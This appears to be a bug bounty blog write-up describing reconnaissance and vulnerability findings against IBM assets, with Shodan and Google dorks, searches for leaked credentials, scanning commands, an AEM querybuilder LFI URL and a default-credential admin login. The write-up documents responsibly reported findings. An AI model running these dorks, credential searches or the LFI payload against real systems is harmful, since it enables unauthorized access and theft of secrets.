How I Get 1st Place in IBM Top Hackers 2025:Exposing 13 Vulnerablilties (Step-by-Step Guide)
Introduction
In 2025, I uncovered 13 vulnerabilities in IBM’s systems, securing the #1 place in IBM Top Hackers. This guide breaks down my methodology, tools, and mindset. No fluff just actionable steps.
Scope & Strategy
IBM’s HackerOne program has 4,440+ reports since 2018. To stand out, I focused on:
- Creativity: Targeting overlooked attack surfaces.
- Persistence: Reporting duplicates until unique flaws emerged.
Vulnerability #1-3: Exposed Secrets
Leaked IBM Cloud Keys via grep.app
I hunted for credentials in public code repositories:
grep.app search:
"ibm_cloud_token"
searchcode.com
query: "password = 'ibm'"
Results:
- AWS keys
- IBM Cloud tokens
and marked is duplicate.
Vulnerability #4-5: Slack Workspace Hijacking
Joining IBM Internal Meetings via Google Dorks
I used the following Google Dorks.
site:ibm.com "slack.com"
site:join.slack.com "ibm"
Exploit:
- Accessed a public Slack URL and joined live meetings.
Vulnerability #6: Waymore + JS Analysis
3.8M URLs Scraped in 1 Hour then access to configurations files
I run the following commands :
waymore -i ibm.com -mode U -oU waymore-ibm.txt
cat waymore-ibm.txt | grep ".js" | httpx -mc 200 -o live-js.txt
Findings
- Database credentials in a `.conf` file and marked is duplicated
- `env.sh` leaking system configs and it triaged
Vulnerability #7-8: AEM Exploit Chain
Outdated AEM Instance = LFI + Unauthenticated Access
Shodan Dork:
ssl:"IBM" http.title:"Adobe Experience Manager"
- AEM Query Builder LFI
Run Nuclei :
nuclei -u https://52.118.x.x:xxxx -tags aem
and Found this url:
https://52.118.x.x:xxxx/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1
and this vulnerable to LFI and can read internal files or paths. just you can change path parameter to any path into system, i do fuzzing and get more paths like ( apps,system,config,etc,home,var,tmp)
Report it and triaged.
Unauthenticated access to Namespace Editor:
Fuzzing revealed an unsecured endpoint:
ffuf -u https://52.118.x.x:xxxx/FUZZ -w aem-list.txt -mc 200
Endpoint Found:
/crx/explorer/ui/namespace_editor.jsp
Impact
- Unauthorized modifications to AEM namespaces.
I reported it and get resolved.
Vulnerability #9: WSO2 Dashboard Takeover
Access to admin panel via Default Credentials
It provides secure authentication, authorization, and user management for applications and services.
Shodan Dork
ssl:IBM http.title:"WSO2 Identity Server"
Exploit:
- Logged in with `admin:admin` and accessed user management controls.
I reported it and get resolved.
Vulnerability #10: Apache Server-Status Leak
Public Apache Server Status Exposed
It provides a web-based interface to monitor server performance and activity.
Automated subdomain scanning with Python:
I developed the following python code:
```
with open("subdomains.txt", "r") as file:
subdomains = file.readlines()
with open("subdomains_with_status.txt", "w") as file:
for subdomain in subdomains:
file.write(subdomain.strip() + "/server-status\n")
```
Impact
- Exposed IPs, request logs, and session data
I reported it and marked is duplicated.
Vulnerability #11: Grafana Metrics Exposure
Unauthenticated Access to Grafana /metrics
The metrics file in a Grafana instance typically contains time-series data collected from various sources.
Shodan Dork
```
ssl:"IBM" http.title:"Grafana"
```
Exploit:
- Add /metrics to URL and will be accessed.
.png)
I reported it and ger resolved.
Vulnerability #12: NTLM Hash Decoding
IBM Internal Network Leak via NTLM
Hashes are decoded using Burp Suite’s SSP Decoder, exposing sensitive authentication data.
Exploit:
- Intercepted NTLM requests and decoded hashes using Burp Suite’s SSP Decoder
I reported it and get duplicated
Vulnerability #13: Unauthenticated access to FLINK Dashboard
Access to Flink Dashboard
Shodan Dork:
After reported 13 Bugs in IBM, I get the first place in IBM Top Hackers 2025
Congratulations 👏🏻, epic job. Thanks for a great writeup.
ReplyDelete